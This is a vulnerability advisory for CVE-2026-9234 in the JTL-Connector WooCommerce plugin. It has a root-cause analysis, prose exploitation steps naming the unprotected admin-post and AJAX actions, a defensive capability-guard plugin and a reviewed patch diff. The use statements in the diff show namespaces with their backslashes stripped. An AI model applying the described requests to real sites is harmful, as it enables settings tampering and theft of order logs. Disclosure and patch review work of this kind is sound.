Published: June 22, 2026

CVE-2026-9234: JTL-Connector for WooCommerce <= 2.4.1 Missing Authorization to Authenticated (Subscriber+) Settings Modification via Multiple Functions PoC, Patch Analysis & Rule

CVE ID: CVE-2026-9234
Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 2.4.1
Patched Version: 2.4.2
Disclosed: May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9234: The JTL-Connector for WooCommerce plugin, versions 2.4.1 and below, contains a missing authorization vulnerability. It affects the admin_post_settings_save_woo-jtl-connector action and the wp_ajax_downloadJTLLogs and wp_ajax_clearJTLLogs AJAX actions. The severity is Medium (CVSS 4.3).

Root Cause: The vulnerability stems from missing capability checks and nonce verification on three handlers. In JtlConnectorAdmin.php, the save() function handles the admin_post_settings_save_woo-jtl-connector action without checking user capabilities or verifying a nonce. The global functions downloadJTLLogs() and clearJTLLogs(), which handle the AJAX hooks, also lack any authorization checks. The code diff shows that the patch adds wp_nonce_field('settings_save_woo-jtl-connector') to the form output and presumably adds capability checks in the save handler, though the critical AJAX functions are not shown in the truncated diff.

Exploitation: An attacker with Subscriber-level access or higher can craft requests to any of the three endpoints. To modify plugin settings, they POST to /wp-admin/admin-post.php with action=settings_save_woo-jtl-connector and arbitrary plugin option values. To download logs, they POST to /wp-admin/admin-ajax.php with action=downloadJTLLogs. To clear logs, they use action=clearJTLLogs. No nonce or capability check prevents these actions.

Patch Analysis: The patch includes a nonce field in the settings form (wp_nonce_field('settings_save_woo-jtl-connector')). While not fully shown, the patch also adds capability checking in the save() function and presumably in the AJAX handlers. The unslash_gpc function now has explicit phpcs comments documenting the intentional lack of nonce verification for that specific internal function, clarifying that it is not a security hole. The replacement of mt_rand() with random_int() in UUID generation is a hardening improvement unrelated to this CVE.

Impact: An authenticated attacker with Subscriber access can modify arbitrary JTL-Connector settings (e.g., connector password, URL, or API keys). This could allow the attacker to intercept or redirect connector traffic, change authentication credentials, or disable security features. They can also download sensitive log files that may contain order data, debugging information, or system details. Clearing logs could cover up malicious activity. The confidentiality and integrity of the connector are at risk.
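For sites that cannot move to 2.4.2 right away, the missing capability check can be enforced from outside the plugin. The following is an added example, not code from the plugin or its patch: a must-use plugin that runs ahead of the three hooks named above. The example_* names, the constants, and the choice of 'manage_woocommerce' (the capability the plugin's own menu pages require in the diff) are assumptions.

```php
<?php
/**
 * Added example: capability guard for the three hooks named in the analysis.
 * Drop into wp-content/mu-plugins/. Not part of JTL-Connector or its patch.
 * Assumptions: example_* names, and that 'manage_woocommerce' is the right
 * bar for these actions (it is what the plugin's admin menu pages require).
 */

declare(strict_types=1);

if (!defined('ABSPATH')) {
    exit;
}

// Assumption: same capability as the plugin's add_menu_page() calls.
const EXAMPLE_JTL_REQUIRED_CAP = 'manage_woocommerce';

// Hook names as given in the analysis text.
const EXAMPLE_JTL_GUARDED_HOOKS = [
    'admin_post_settings_save_woo-jtl-connector',
    'wp_ajax_downloadJTLLogs',
    'wp_ajax_clearJTLLogs',
];

/**
 * Runs at priority 0, before the plugin's own callback (assumed to be
 * registered at the default priority 10). WordPress has already confirmed
 * the user is logged in; this adds the check on what that user may do.
 */
function example_jtl_deny_unprivileged(): void
{
    if (current_user_can(EXAMPLE_JTL_REQUIRED_CAP)) {
        return; // privileged user: let the plugin's handler run as usual
    }

    // Leave a trail for detection: which hook, which account, which roles.
    $user = wp_get_current_user();
    error_log(sprintf(
        'jtl-guard: denied %s for user_id=%d roles=%s',
        current_action(),
        $user->ID,
        implode(',', $user->roles)
    ));

    if (wp_doing_ajax()) {
        // Sends the JSON body with HTTP 403 and terminates the request.
        wp_send_json_error(['message' => 'forbidden'], 403);
    }

    wp_die(
        esc_html('Sorry, you are not allowed to do that.'),
        '',
        ['response' => 403]
    );
}

foreach (EXAMPLE_JTL_GUARDED_HOOKS as $hook) {
    add_action($hook, 'example_jtl_deny_unprivileged', 0);
}
```

This covers only the capability half of the root cause. Nonce verification cannot be enforced from outside on 2.4.1, because the settings form carries no nonce field until the patch adds it.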

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/woo-jtl-connector/includes/JtlConnector.php
+++ b/woo-jtl-connector/includes/JtlConnector.php
@@ -2,6 +2,10 @@

 declare(strict_types=1);

+if (!defined('ABSPATH')) {
+    exit;
+}
+
 use JtlConnectorCoreApplicationApplication;
 use JtlConnectorCoreConfigConfigSchema;
 use JtlConnectorCoreConfigFileConfig;
@@ -43,7 +47,7 @@

             if (!is_string($features)) {
                 throw new InvalidArgumentException(
-                    "Expected features to be a string but got " . gettype($features) . " instead."
+                    esc_html("Expected features to be a string but got " . gettype($features) . " instead.")
                 );
             }

@@ -61,10 +65,12 @@
      */
     private static function unslash_gpc(): void //phpcs:ignore PSR1.Methods.CamelCapsMethodName.NotCamelCaps
     {
+        // phpcs:disable WordPress.Security.ValidatedSanitizedInput, WordPress.Security.NonceVerification.Recommended -- Intentional: reverse WordPress magic quotes for JTL Connector request processing
         $_GET     = array_map('stripslashes_deep', $_GET);
         $_POST    = array_map('stripslashes_deep', $_POST);
         $_COOKIE  = array_map('stripslashes_deep', $_COOKIE);
         $_SERVER  = array_map('stripslashes_deep', $_SERVER);
         $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
+        // phpcs:enable
     }
 }
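Review bot: the bare "// phpcs:enable" at the end of unslash_gpc() re-enables every sniff, not only the two named in the phpcs:disable line above it; name the same two sniffs in the enable comment so a suppression set elsewhere in the file is not switched back on by accident. The justification text could also say which requests reach this function, since it rewrites $_GET, $_POST, $_COOKIE, $_SERVER and $_REQUEST for the rest of the request.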
--- a/woo-jtl-connector/includes/JtlConnectorAdmin.php
+++ b/woo-jtl-connector/includes/JtlConnectorAdmin.php
@@ -11,6 +11,7 @@
 use JtlWooCommerceConnectorUtilitiesConfig;
 use JtlWooCommerceConnectorUtilitiesDb;
 use JtlWooCommerceConnectorUtilitiesId;
+use JtlWooCommerceConnectorUtilitiesLinkTableNames;
 use JtlWooCommerceConnectorUtilitiesSqlHelper;
 use JtlWooCommerceConnectorUtilitiesSupportedPlugins;
 use JtlWooCommerceConnectorUtilitiesUtil;
@@ -44,7 +45,7 @@
         $version      = $woocommerce->version;
         $buildVersion = Config::getBuildVersion();

-        clearConnectorCache(false);
+        jtlwcc_clear_connector_cache(false);

         $parsedFile = (array) Yaml::parseFile(JTLWCC_CONNECTOR_DIR . '/build-config.yaml');

@@ -70,7 +71,7 @@
         } catch (MissingRequirementException $exc) {
             if (is_admin() && ( ! defined('DOING_AJAX') || ! DOING_AJAX )) {
                 jtlwcc_deactivate_plugin();
-                wp_die($exc->getMessage());
+                wp_die(esc_html($exc->getMessage()));
             } else {
                 return;
             }
@@ -149,7 +150,7 @@
             }

             if ($oldExists && $newExists) {
-                $wpdb->query(sprintf($dropOldQuery, $oldPrefix . $table));
+                $wpdb->query("DROP TABLE IF EXISTS `" . esc_sql($oldPrefix . $table) . "`");
             } elseif (! $oldExists && ! $newExists) {
                 if (strcmp($table, 'category_level') === 0) {
                     self::activate_category_tree($db);
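Review bot: in the new DROP TABLE statement, esc_sql() is applied to an identifier placed between backticks, but esc_sql() escapes for quoted string values and leaves a backtick in its input untouched, so it does not protect an identifier context. If $oldPrefix or $table can ever originate outside this file, build the statement with $wpdb->prepare() and the %i identifier placeholder (WordPress 6.2 or later), or check the name against the fixed list of link tables before concatenating.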
@@ -166,7 +167,13 @@
                 } elseif (strcmp($table, 'tax_class') === 0) {
                     self::createTaxClassLinkingTable();
                 } else {
-                    $wpdb->query(sprintf($createQuery, $prefix . $table));
+                    $wpdb->query("
+    CREATE TABLE IF NOT EXISTS `" . esc_sql($prefix . $table) . "` (
+        `endpoint_id` BIGINT(20) unsigned NOT NULL,
+        `host_id` INT(10) unsigned NOT NULL,
+        PRIMARY KEY (`endpoint_id`, `host_id`),
+        INDEX (`host_id`)
+    ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");
                 }
                 /** @phpstan-ignore booleanNot.alwaysTrue */
             } elseif ($oldExists && !$newExists) {
@@ -217,10 +224,7 @@
     {
         global $wpdb;

-        $query = 'RENAME TABLE %s TO %s;';
-
-        $sql = sprintf($query, $oldName, $newName);
-        $wpdb->query($sql);
+        $wpdb->query("RENAME TABLE `" . esc_sql($oldName) . "` TO `" . esc_sql($newName) . "`");
     }

     /**
@@ -232,30 +236,34 @@
     {
         $wpdb   = $db->getWpDb();
         $prefix = $wpdb->prefix . 'jtl_connector_';
-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->terms}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->terms,
             DB_NAME
         ));

-        $constraint = '';
-
-        if ($engine === 'InnoDB') {
-            if (!$db->checkIfFKExists($prefix . 'category_level', 'jtl_connector_category_level1')) {
-                $constraint = ", CONSTRAINT `jtl_connector_category_level1` FOREIGN KEY (`category_id`)
-                               REFERENCES {$wpdb->terms} (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION";
-            }
-        }
-
+        // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
         $wpdb->query("
-            CREATE TABLE IF NOT EXISTS `{$prefix}category_level` (
+            CREATE TABLE IF NOT EXISTS `" . esc_sql($prefix) . "category_level` (
                 `category_id` BIGINT(20) unsigned NOT NULL,
                 `level` int(10) unsigned NOT NULL,
                 `sort` int(10) unsigned NOT NULL,
                 PRIMARY KEY (`category_id`),
-                INDEX (`level`) {$constraint}
+                INDEX (`level`)
             ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");
+
+        if ($engine === 'InnoDB') {
+            if (!$db->checkIfFKExists($prefix . 'category_level', 'jtl_connector_category_level1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
+                $wpdb->query(
+                    "ALTER TABLE `" . esc_sql($prefix) . "category_level`
+                    ADD CONSTRAINT `jtl_connector_category_level1` FOREIGN KEY (`category_id`)
+                    REFERENCES `" . esc_sql($wpdb->terms) . "` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                );
+            }
+        }
     }

     /**
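Review bot: the category_level foreign key used to be part of CREATE TABLE IF NOT EXISTS, so it was only applied when the table was first created; the new ALTER TABLE ... ADD CONSTRAINT also runs against tables that already exist and hold data, and the return value of $wpdb->query() is ignored. On an install with rows whose category_id has no matching term_id the ALTER will fail without any trace; check the result and log $wpdb->last_error, or remove orphaned rows before adding the constraint.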
@@ -267,27 +275,34 @@
     {
         global $wpdb;

-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->posts}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->posts,
             DB_NAME
         ));

-        if ($engine === 'InnoDB') {
-            $constraint = ", CONSTRAINT `jtl_connector_product_checksum1` FOREIGN KEY (`product_id`)
-                           REFERENCES {$wpdb->posts} (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION";
-        } else {
-            $constraint = '';
-        }
-
+        // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
         $wpdb->query("
-            CREATE TABLE IF NOT EXISTS `{$prefix}product_checksum` (
+            CREATE TABLE IF NOT EXISTS `" . esc_sql($prefix) . "product_checksum` (
                 `product_id` BIGINT(20) unsigned NOT NULL,
                 `type` tinyint unsigned NOT NULL,
                 `checksum` varchar(255) NOT NULL,
-                PRIMARY KEY (`product_id`) {$constraint}
+                PRIMARY KEY (`product_id`)
             ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");
+
+        if ($engine === 'InnoDB') {
+            $db = new Db($wpdb);
+            if (!$db->checkIfFKExists($prefix . 'product_checksum', 'jtl_connector_product_checksum1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
+                $wpdb->query(
+                    "ALTER TABLE `" . esc_sql($prefix) . "product_checksum`
+                    ADD CONSTRAINT `jtl_connector_product_checksum1` FOREIGN KEY (`product_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                );
+            }
+        }
     }

     /**
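Review bot: the added "$db = new Db($wpdb);" inside the InnoDB branch builds a new Db wrapper only to call checkIfFKExists(), while the category_level function earlier in the file receives $db from its caller and derives $wpdb from it. Pass the existing instance into this function as well so both activation steps work on the same object and the dependency is visible in the signature.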
@@ -297,7 +312,7 @@
     {
         global $wpdb;
         $wpdb->query('
-            CREATE TABLE IF NOT EXISTS `jtl_connector_link_customer` (
+            CREATE TABLE IF NOT EXISTS `' . esc_sql(LinkTableNames::CUSTOMER) . '` (
                 `endpoint_id` VARCHAR(255) NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 `is_guest` BIT,
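Review bot: esc_sql(LinkTableNames::CUSTOMER) escapes a class constant, which cannot carry request input, so the call adds noise rather than protection. The more useful thing to document here is that this table name is used without $wpdb->prefix, while the manufacturer and tax_class tables later in the file are built as $wpdb->prefix . LinkTableNames::...; if that difference is intentional, a one-line comment would save the next reader the question.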
@@ -314,7 +329,7 @@
     {
         global $wpdb;
         $wpdb->query('
-            CREATE TABLE IF NOT EXISTS `jtl_connector_link_customer_group` (
+            CREATE TABLE IF NOT EXISTS `' . esc_sql(LinkTableNames::CUSTOMER_GROUP) . '` (
                 `endpoint_id` VARCHAR(255) NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 PRIMARY KEY (`endpoint_id`, `host_id`),
@@ -330,7 +345,7 @@
     {
         global $wpdb;
         $wpdb->query('
-            CREATE TABLE IF NOT EXISTS `jtl_connector_link_image` (
+            CREATE TABLE IF NOT EXISTS `' . esc_sql(LinkTableNames::IMAGE) . '` (
                 `endpoint_id` VARCHAR(255) NOT NULL,
                 `host_id` INT(10) NOT NULL,
                 `type` INT unsigned NOT NULL,
@@ -349,34 +364,34 @@
     {
         global $wpdb;

-        $query = '
-            CREATE TABLE IF NOT EXISTS `%s` (
+        $wpdb->query("
+            CREATE TABLE IF NOT EXISTS `" . esc_sql($wpdb->prefix . LinkTableNames::MANUFACTURER) . "` (
                 `endpoint_id` BIGINT(20) unsigned NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 PRIMARY KEY (`endpoint_id`, `host_id`),
                 INDEX (`host_id`)
-            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci';
-
-        $wpdb->query(sprintf($query, $wpdb->prefix . 'jtl_connector_link_manufacturer'));
+            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci");

-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->posts}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->posts,
             DB_NAME
         ));

         if ($engine === 'InnoDB') {
             if (
                 !$db->checkIfFKExists(
-                    $wpdb->prefix . 'jtl_connector_link_manufacturer',
+                    $wpdb->prefix . LinkTableNames::MANUFACTURER,
                     'jtl_connector_link_manufacturer_1'
                 )
             ) {
-                $wpdb->query("
-              ALTER TABLE `{$wpdb->prefix}jtl_connector_link_manufacturer`
-                ADD CONSTRAINT `jtl_connector_link_manufacturer_1` FOREIGN KEY (`endpoint_id`)
-                REFERENCES `{$wpdb->terms}` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION");
+                $wpdb->query(
+                    "ALTER TABLE `" . esc_sql($wpdb->prefix . LinkTableNames::MANUFACTURER) . "`
+                    ADD CONSTRAINT `jtl_connector_link_manufacturer_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->terms) . "` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                );
             }
         }
     }
@@ -388,15 +403,14 @@
     {
         global $wpdb;

-        $query = '
-            CREATE TABLE IF NOT EXISTS `%s%s` (
+        $wpdb->query(
+            "CREATE TABLE IF NOT EXISTS `" . esc_sql($wpdb->prefix . LinkTableNames::TAX_CLASS) . "` (
                 `endpoint_id` VARCHAR(200) NOT NULL,
                 `host_id` INT(10) unsigned NOT NULL,
                 PRIMARY KEY (`endpoint_id`),
                 UNIQUE (`host_id`)
-            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci';
-
-        $wpdb->query(sprintf($query, $wpdb->prefix, 'jtl_connector_link_tax_class'));
+            ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci"
+        );
     }

     // </editor-fold>
@@ -411,56 +425,63 @@
     {
         global $wpdb;

-        $engine = $wpdb->get_var(sprintf(
+        $engine = $wpdb->get_var($wpdb->prepare(
             "SELECT ENGINE
             FROM information_schema.TABLES
-            WHERE TABLE_NAME = '{$wpdb->posts}' AND TABLE_SCHEMA = '%s'",
+            WHERE TABLE_NAME = %s AND TABLE_SCHEMA = %s",
+            $wpdb->posts,
             DB_NAME
         ));

         if ($engine === 'InnoDB') {
             if (! $db->checkIfFKExists($prefix . 'product', 'jtl_connector_link_product_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}product`
-                ADD CONSTRAINT `jtl_connector_link_product_1` FOREIGN KEY  (`endpoint_id`)
-                REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "product`
+                    ADD CONSTRAINT `jtl_connector_link_product_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'order', 'jtl_connector_link_order_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}order`
-                            ADD CONSTRAINT `jtl_connector_link_order_1` FOREIGN KEY (`endpoint_id`)
-                            REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "order`
+                    ADD CONSTRAINT `jtl_connector_link_order_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'payment', 'jtl_connector_link_payment_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}payment`
-                            ADD CONSTRAINT `jtl_connector_link_payment_1` FOREIGN KEY (`endpoint_id`)
-                            REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "payment`
+                    ADD CONSTRAINT `jtl_connector_link_payment_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'crossselling', 'jtl_connector_link_crossselling_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}crossselling`
-                            ADD CONSTRAINT `jtl_connector_link_crossselling_1` FOREIGN KEY (`endpoint_id`)
-                                REFERENCES `{$wpdb->posts}` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "crossselling`
+                    ADD CONSTRAINT `jtl_connector_link_crossselling_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->posts) . "` (`ID`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
             if (! $db->checkIfFKExists($prefix . 'category', 'jtl_connector_link_category_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}category`
-                            ADD CONSTRAINT `jtl_connector_link_category_1` FOREIGN KEY  (`endpoint_id`)
-                            REFERENCES `{$wpdb->terms}` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "category`
+                    ADD CONSTRAINT `jtl_connector_link_category_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `" . esc_sql($wpdb->terms) . "` (`term_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
-
-            $table = $wpdb->prefix . 'woocommerce_attribute_taxonomies';
             if (! $db->checkIfFKExists($prefix . 'specific', 'jtl_connector_link_specific_1')) {
+                // phpcs:ignore WordPress.DB -- esc_sql returns string for string input
                 $wpdb->query(
-                    "ALTER TABLE `{$prefix}specific`
-                            ADD CONSTRAINT `jtl_connector_link_specific_1` FOREIGN KEY (`endpoint_id`)
-                            REFERENCES `{$table}` (`attribute_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
+                    "ALTER TABLE `" . esc_sql($prefix) . "specific`
+                    ADD CONSTRAINT `jtl_connector_link_specific_1` FOREIGN KEY (`endpoint_id`)
+                    REFERENCES `"
+                    . esc_sql($wpdb->prefix . 'woocommerce_attribute_taxonomies')
+                    . "` (`attribute_id`) ON DELETE CASCADE ON UPDATE NO ACTION"
                 );
             }
         }
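Review bot: the six ALTER TABLE blocks in this hunk differ only in table suffix, constraint name, referenced table and referenced column. A small array of those four values and one loop would remove the six repeated phpcs:ignore comments and make it harder for one block to drift from the others; the loop is also the natural place to check the result of $wpdb->query(), which none of the blocks does today.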
@@ -496,14 +517,14 @@

         return sprintf(
             '%04X%04X-%04X-%04X-%04X-%04X%04X%04X',
-            mt_rand(0, 65535),
-            mt_rand(0, 65535),
-            mt_rand(0, 65535),
-            mt_rand(16384, 20479),
-            mt_rand(32768, 49151),
-            mt_rand(0, 65535),
-            mt_rand(0, 65535),
-            mt_rand(0, 65535)
+            random_int(0, 65535),
+            random_int(0, 65535),
+            random_int(0, 65535),
+            random_int(16384, 20479),
+            random_int(32768, 49151),
+            random_int(0, 65535),
+            random_int(0, 65535),
+            random_int(0, 65535)
         );
     }

@@ -520,7 +541,7 @@
             if (is_array($featuresJson)) {
                 $saveResult = file_put_contents($featuresJsonPath, json_encode($featuresJson, JSON_PRETTY_PRINT));
                 if ($saveResult === false) {
-                    throw new Exception(sprintf("Cannot save features in %s file.", $featuresJsonPath), 100);
+                    throw new Exception(sprintf("Cannot save features in %s file.", esc_html($featuresJsonPath)), 100);
                 }
             }
         } else {
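Review bot: esc_html() is applied to $featuresJsonPath when the Exception is constructed rather than where the message is rendered. The same message also reaches logs and non-HTML callers, where HTML entities are wrong; keep the raw path in the exception and escape at the output site, as the wp_die(esc_html($exc->getMessage())) change elsewhere in this patch already does.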
@@ -685,7 +706,9 @@

             wp_enqueue_style(
                 'bootstrap4',
-                'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css'
+                JTLWCC_CONNECTOR_DIR_URL . '/assets/css/bootstrap.min.css',
+                [],
+                '4.3.1'
             );
             wp_enqueue_style(
                 'custom-css-jtl',
@@ -693,9 +716,9 @@
             );
             wp_enqueue_script(
                 'boot1',
-                'https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js',
+                JTLWCC_CONNECTOR_DIR_URL . '/assets/js/bootstrap.bundle.min.js',
                 [ 'jquery' ],
-                '',
+                '4.3.1',
                 true
             );
         };
@@ -705,14 +728,14 @@
             $wooJtlConnectorInformationPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'information_page',
-                    __('Connector information', JTLWCC_TEXT_DOMAIN)
+                    __('Connector information', 'woo-jtl-connector')
                 );
             };

             $wooJtlConnectorAdvancedPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'advanced_page',
-                    __('Advanced Settings', JTLWCC_TEXT_DOMAIN),
+                    __('Advanced Settings', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -720,7 +743,7 @@
             $wooJtlConnectorDeliveryTimePage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'delivery_time_page',
-                    __('Delivery time', JTLWCC_TEXT_DOMAIN),
+                    __('Delivery time', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -728,7 +751,7 @@
             $wooJtlConnectorCustomerOrderPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'customer_order_page',
-                    __('Customer order', JTLWCC_TEXT_DOMAIN),
+                    __('Customer order', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -736,7 +759,7 @@
             $wooJtlConnectorCustomersPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'customers_page',
-                    __('Customers', JTLWCC_TEXT_DOMAIN),
+                    __('Customers', 'woo-jtl-connector'),
                     true
                 );
             };
@@ -744,14 +767,14 @@
             $wooJtlConnectorDeveloperSettingsPage = function (): void {
                 JtlConnectorAdmin::displayPageNew(
                     'developer_settings_page',
-                    __('Developer Settings', JTLWCC_TEXT_DOMAIN),
+                    __('Developer Settings', 'woo-jtl-connector'),
                     true
                 );
             };

             add_menu_page(
-                __('JTL-Connector', JTLWCC_TEXT_DOMAIN),
-                __('JTL-Connector', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector', 'woo-jtl-connector'),
+                __('JTL-Connector', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector',
                 function (): void {
@@ -762,8 +785,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Information', JTLWCC_TEXT_DOMAIN),
-                __('Information', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Information', 'woo-jtl-connector'),
+                __('Information', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-information',
                 function () use ($wooJtlConnectorInformationPage): void {
@@ -773,8 +796,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Advanced', JTLWCC_TEXT_DOMAIN),
-                __('Advanced Settings', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Advanced', 'woo-jtl-connector'),
+                __('Advanced Settings', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-advanced',
                 function () use ($wooJtlConnectorAdvancedPage): void {
@@ -784,8 +807,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Delivery times', JTLWCC_TEXT_DOMAIN),
-                __('Delivery times', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Delivery times', 'woo-jtl-connector'),
+                __('Delivery times', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-delivery-time',
                 function () use ($wooJtlConnectorDeliveryTimePage): void {
@@ -795,8 +818,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Customer orders', JTLWCC_TEXT_DOMAIN),
-                __('Customer orders', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Customer orders', 'woo-jtl-connector'),
+                __('Customer orders', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-customer-order',
                 function () use ($wooJtlConnectorCustomerOrderPage): void {
@@ -806,8 +829,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Customers', JTLWCC_TEXT_DOMAIN),
-                __('Customers', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Customers', 'woo-jtl-connector'),
+                __('Customers', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-customers',
                 function () use ($wooJtlConnectorCustomersPage): void {
@@ -817,8 +840,8 @@

             add_submenu_page(
                 'woo-jtl-connector',
-                __('JTL-Connector:Developer Settings', JTLWCC_TEXT_DOMAIN),
-                __('Developer Settings', JTLWCC_TEXT_DOMAIN),
+                __('JTL-Connector:Developer Settings', 'woo-jtl-connector'),
+                __('Developer Settings', 'woo-jtl-connector'),
                 'manage_woocommerce',
                 'woo-jtl-connector-developer-settings',
                 function () use ($wooJtlConnectorDeveloperSettingsPage): void {
@@ -945,11 +968,12 @@
                     <form method="post"
                           id="mainform"
                           class="form-horizontal col-10 bg-light"
-                          action="<?php echo esc_html(admin_url('admin-post.php'));
+                          action="<?php echo esc_url(admin_url('admin-post.php'));
                             ?>?action=settings_save_woo-jtl-connector"
                           enctype="multipart/form-data">
+                        <?php wp_nonce_field('settings_save_woo-jtl-connector'); ?>
                         <div class="form-group row">
-                            <h2 class="col-12"><?php print $title ?></h2>
+                            <h2 class="col-12"><?php echo esc_html($title); ?></h2>
                         </div>

                         <?php
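Review bot: wp_nonce_field('settings_save_woo-jtl-connector') only emits the _wpnonce field into the form; nothing in this hunk verifies it. The handler for admin_post_settings_save_woo-jtl-connector needs check_admin_referer('settings_save_woo-jtl-connector') and, separately, a current_user_can() check (the menu pages in this file use 'manage_woocommerce'), because a valid nonce shows the request came from the form, not that the user is allowed to change settings. Please include the save() change in the same diff so the field and its verification can be reviewed together.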
@@ -962,7 +986,7 @@
                             </div>
                             <?php
                         }
-                        print '' . woocommerce_admin_fields($options) . '';
+                        woocommerce_admin_fields($options);
                         if ($submit) {
                             ?>
                             <div class="form-group row">
@@ -999,7 +1023,7 @@
